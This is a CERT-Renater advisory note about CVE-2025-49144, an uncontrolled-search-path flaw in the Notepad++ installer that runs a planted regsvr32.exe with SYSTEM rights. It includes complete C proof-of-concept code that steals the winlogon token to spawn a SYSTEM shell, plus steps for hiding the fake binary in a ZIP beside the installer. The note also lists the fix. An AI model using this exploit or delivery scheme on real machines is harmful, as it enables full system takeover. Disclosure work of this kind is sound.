=====================================================================
CERT-Renater Information Note No. 2025/VULN390
_____________________________________________________________________

DATE                 : 25/06/2025
HARDWARE PLATFORM(S) : /
OPERATING SYSTEM(S)  : Systems running Notepad++ versions prior to 8.8.2.
=====================================================================

https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-g5rj-m8mm-cgw6
https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-9vx8-v79m-6m24
_____________________________________________________________________

Remote Code Execution notepad++ using Uncontrolled Search Path Vulnerability

Severity: High
donho published GHSA-g5rj-m8mm-cgw6 on Jun 20, 2025

Package           : npp.8.7.8installer.x64.exe (notepad++)
Affected versions : old versions - 8.8.1
Patched versions  : 8.8.2

Description

Summary

The installer searches for regsvr32.exe in the current working directory (CWD) if it is not found in the expected path, allowing that regsvr32.exe to be executed. If regsvr32.exe is designed to escalate privileges, it can further execute cmd.exe with SYSTEM privilege, because the installer requires SYSTEM privilege during the installation process.

Test Environment

OS     : Windows 11 version 23H2 (OS build 22631.5039)
Target : npp.8.7.8installer.x64.exe

Detail

When running the installer and proceeding with the default options, the installer fails to locate regsvr32.exe in the expected path. As a result, it searches for regsvr32.exe in the current working directory (CWD) and executes it, leading to a potential security issue. If an attacker places a malicious regsvr32.exe in the CWD, it can be executed with elevated privileges. Furthermore, if properly crafted, this can lead to privilege escalation, ultimately granting SYSTEM-level access.
Root Cause

Improper handling of executable file paths, causing unintended execution from the current working directory (CWD).

Potential Exploitation Scenarios

An attacker distributes a ZIP archive containing a legitimate installer alongside a hidden, malicious regsvr32.exe file. To entice victims into executing the installer, the attacker falsely advertises the new version as featuring multiple color themes and enhanced functionality, making it appear more attractive than previous releases. Since regsvr32.exe is concealed within the archive, the victim remains unaware of its presence. Upon extracting the ZIP file and running the installer, the installer inadvertently searches for regsvr32.exe in the current working directory (CWD) and executes it, unknowingly launching the attacker's payload. This technique increases the likelihood of successful exploitation, as victims believe they are installing an upgraded version of the software while the hidden malicious executable operates unnoticed.

Impact

This vulnerability is a remote code execution (RCE) caused by an uncontrolled search path. If the attacker places a malicious regsvr32.exe in the same directory as the installer, it will be executed when the victim runs the installer. Since the execution occurs with SYSTEM privileges, this can lead to significant security risks, including full system compromise.

How to Reproduce the Vulnerability?

1. Create regsvr32.exe with the PoC code.
2. Hide regsvr32.exe and compress it into a ZIP file along with npp.8.7.8installer.x64.exe.
3. After extracting the ZIP file, execute npp.8.7.8installer.x64.exe.

PoC code for Privilege Escalation

// Built as a Unicode program: the code uses LPCWSTR and L"..." strings throughout.
#define UNICODE
#define _UNICODE
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

// Enables the named privilege (here SeDebugPrivilege) on the current process token.
BOOL EnablePrivilege(LPCWSTR privilege) {
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return FALSE;
    }
    LookupPrivilegeValue(NULL, privilege, &tp.Privileges[0].Luid);
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
    CloseHandle(hToken);
    return GetLastError() == ERROR_SUCCESS;
}

// Walks the process list, finds winlogon.exe (a SYSTEM process) and
// returns a duplicated primary token for it, or NULL on failure.
HANDLE GetSystemProcessToken() {
    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32) };
    HANDLE hProcess = NULL, hToken = NULL, hDupToken = NULL;
    if (Process32First(hProcessSnap, &pe32)) {
        do {
            if (_wcsicmp(pe32.szExeFile, L"winlogon.exe") == 0) {
                hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pe32.th32ProcessID);
                if (hProcess) {
                    if (OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &hToken)) {
                        DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &hDupToken);
                    }
                    CloseHandle(hProcess);
                    CloseHandle(hToken);
                }
                break;
            }
        } while (Process32Next(hProcessSnap, &pe32));
    }
    CloseHandle(hProcessSnap);
    return hDupToken;
}

int main() {
    if (!EnablePrivilege(SE_DEBUG_NAME)) {
        printf("Failed to enable SeDebugPrivilege.\n");
        return 1;
    }
    HANDLE hSystemToken = GetSystemProcessToken();
    if (!hSystemToken) {
        printf("Failed to obtain SYSTEM token.\n");
        return 1;
    }
    // Starts cmd.exe under the duplicated token.
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi;
    if (CreateProcessWithTokenW(hSystemToken, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe",
                                NULL, 0, NULL, NULL, &si, &pi)) {
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
        printf("SYSTEM shell spawned!\n");
    } else {
        printf("Failed to create process with SYSTEM token.\n");
    }
    CloseHandle(hSystemToken);
    return 0;
}

This code is compiled as regsvr32.exe. The program obtains a cmd.exe with SYSTEM privileges.

Credit

Jinho Jung, Junhyuk Im, Jong Geon KIM, Seungyun LEE, Junwoo Seong, Jeongmin Choi

Severity: High, 8.6 / 10

CVSS v3 base metrics
  Attack vector       : Local
  Attack complexity   : Low
  Privileges required : None
  User interaction    : Required
  Scope               : Changed
  Confidentiality     : High
  Integrity           : High
  Availability        : High
  CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE ID     : CVE-2025-49144
Weaknesses : CWE-427
Credits    : @ijh4723 (Finder), @chocovy (Analyst)
_____________________________________________________________________

Privilege Escalation in Notepad++ v8.8.1 Installer via Uncontrolled Executable Search Path

Severity: High
donho published GHSA-9vx8-v79m-6m24 on Jun 21, 2025

Package           : Notepad++ (Windows)
Affected versions : old versions - v8.8.1
Patched versions  : v8.8.2

Description

A privilege escalation vulnerability exists in the Notepad++ v8.8.1 installer that allows unprivileged users to gain SYSTEM-level privileges through insecure executable search paths. This vulnerability can be exploited with minimal user interaction.

Vulnerability Details

Type              : Uncontrolled EXE/DLL Search Path (Binary Planting)
Impact            : Local Privilege Escalation to NT AUTHORITY\SYSTEM
Affected Software : Notepad++ v8.8.1 installer - Release Date: 2025-05-05
Severity          : High

Technical Overview

The installer searches for executable dependencies in the current working directory without verification, allowing attackers to place malicious executables that will be loaded with SYSTEM privileges during installation.
For more info please refer to this blog: Microsoft, Secure Loading of Libraries.

Attack Method

Preparation   : Attacker places a malicious executable (e.g., regsvr32.exe) in a directory
Attack Vector : User downloads and runs the Notepad++ v8.8.1 installer
Execution     : Installer loads the malicious executable from the current directory with SYSTEM privileges
Result        : Attacker gains complete system control

POC

Process Monitor logs show the installer searching for the executable in the current directory (screenshot: procmon-check).
Proof of concept demonstrated successful privilege escalation via reverse shell (screenshot: Notepad++ exploited).
Video demonstration confirms exploitation success.
Proof of Concept Materials: Google Drive Folder with PoC and Video

Security Implications

- Privilege Escalation: Unprivileged users gain SYSTEM-level permission
- Code Execution: Arbitrary code runs with elevated privileges
- Data Breach: Potential for sensitive data theft
- Lateral Movement: Compromised system could be used to attack the network

Real-World Attack Scenario

An attacker could use social engineering or clickjacking to trick users into downloading both the legitimate installer and a malicious executable to the same directory (typically the Downloads folder, which is known as a vulnerable directory). Upon running the installer, the attack executes automatically with SYSTEM privileges.

Similar Vulnerabilities

- CVE-2023-6401 & CVE-2023-47452 - in previous Notepad++ versions
- CVE-2024-44346: Similar binary planting vulnerability
- Dell SupportAssist vulnerability (DSA-2024-312)

Recommendations

- Modify the installer to use absolute paths for dependency loading
- Implement digital signature verification of loaded executables
- Create and use secure temporary directories with randomized names
- Follow Microsoft's secure library loading guidance

Conclusion

This is a critical security vulnerability requiring immediate attention.
While Microsoft classifies some binary planting issues as "Defense-in-Depth," the severity of gaining SYSTEM privileges with minimal user interaction warrants priority remediation.

Collaborators

Shashi Raj - https://github.com/EmperialX
Yatharth Tyagi - https://github.com/Heated-Yeti
Kunal Choudhary - https://github.com/kunal0x00

References

https://www.dell.com/support/kbdoc/en-us/000227899/dsa-2024-312-security-update-for-dell-supportassist-for-home-pcs-installer-file-local-privilege-escalation-vulnerability
https://unit42.paloaltonetworks.com/vulnerabilities-in-iconics-software-suite/
https://nvd.nist.gov/vuln/detail/CVE-2025-26624
https://unit42.paloaltonetworks.com/dll-hijacking-techniques/
https://support.microsoft.com/en-us/topic/secure-loading-of-libraries-to-prevent-dll-preloading-attacks-d41303ec-0748-9211-f317-2edc819682e1

Update

We have identified the root cause of this issue, which leads to the EXE side-loading vulnerability in Notepad++. The issue arises because regsvr32 was invoked without specifying its absolute path, making it susceptible to loading a malicious executable from the current working directory.

Before (Vulnerable):

    ExecWait 'regsvr32 /u /s "$INSTDIR\NppShell_01.dll"'

After (Secure):

    ExecWait '$SYSDIR\regsvr32.exe /u /s "$INSTDIR\NppShell_01.dll"'

We made the changes in all the required places. (screenshot)

After making these changes, regsvr32 picked up the correct path. (screenshot)

According to Microsoft's documentation, regsvr32 is always located in the System32 directory. Therefore, it's best practice to use the absolute path to avoid potential side-loading vulnerabilities.
Vulnerable code reference:

    ExecWait 'regsvr32 /u /s "$INSTDIR\NppShell_01.dll"'

Severity: High, 7.3 / 10

CVSS v3 base metrics
  Attack vector       : Local
  Attack complexity   : Low
  Privileges required : Low
  User interaction    : Required
  Scope               : Unchanged
  Confidentiality     : High
  Integrity           : High
  Availability        : High
  CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVE ID     : CVE-2025-49144
Weaknesses : CWE-272, CWE-276, CWE-427
Credits    : @EmperialX (Reporter), @Heated-Yeti (Reporter), @kunal0x00 (Reporter)

=========================================================
+ CERT-RENATER       | tel : 01-53-94-20-44             +
+ 23/25 Rue Daviel   | fax : 01-53-94-20-41             +
+ 75013 Paris        | email : cert@support.renater.fr  +
=========================================================